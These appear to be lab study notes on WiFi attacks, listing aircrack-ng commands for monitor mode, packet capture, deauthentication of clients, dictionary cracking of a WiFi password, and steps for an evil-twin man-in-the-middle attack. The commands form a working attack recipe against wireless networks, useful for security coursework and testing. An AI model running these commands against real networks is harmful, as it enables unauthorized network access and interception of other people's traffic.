- ifconfig
  - To see the wifi interface
- Disable network interface card
  - sudo systemctl stop NetworkManager.service
- Start the Wifi interface in monitor mode at a specific channel
  - sudo airmon-ng start wlp0s20f3 11
    - This channel should match the channel in which the AP is operating in
  - sudo airmon-ng stop wlp0s20f3monmon 11
    - Stop wifi interface in monitor mode and get in regular mode
- See the packets being captured in monitor mode
  - sudo airodump-ng wlp0s20f3mon
- Deauthentication Attack
  - sudo aireplay-ng -0 1 -a <AP\_MAC> -c <Client's MAC> <Wlfi Interface>
- Crack Wifi Password using a dictionary
  - sudo aircrack-ng -w password.lst.1 -b <AP\_MAC> <PCAP File>
- Filter

wlan.ssid == "Godfather" or wlan.sa == 08:25:25:a9:70:26 or wlan.da == 08:25:25:a9:70:26

- Packet capture using airodump-ng sudo airodump-ng -w PARTB\_IITH\_GUEST\_FAILURE --output-format pcap
  --bssid 7C:95:F3:C0:1C:93 --channel 11 wlp0s20f3mon
- 1. Man in the middle attack with EVIL TWIN
  - a. Have a Genuine AP
  - b. Have a client connected to a Genuine AP
  - c. Start WiFi card in monitor and start airodump to see in which channel is the genuine AP operating in
  - d. Create a fake AP/hotspot with the same name and same password in different channel
    - i. <u>https://anooppoommen.medium.com/create-a-wifi-hotspot-on-linux-29</u> 349b9c582d
  - e. Start the fake AP and start wireshark capture
  - f. Deauth the client from genuine ap to get connected to the fake AP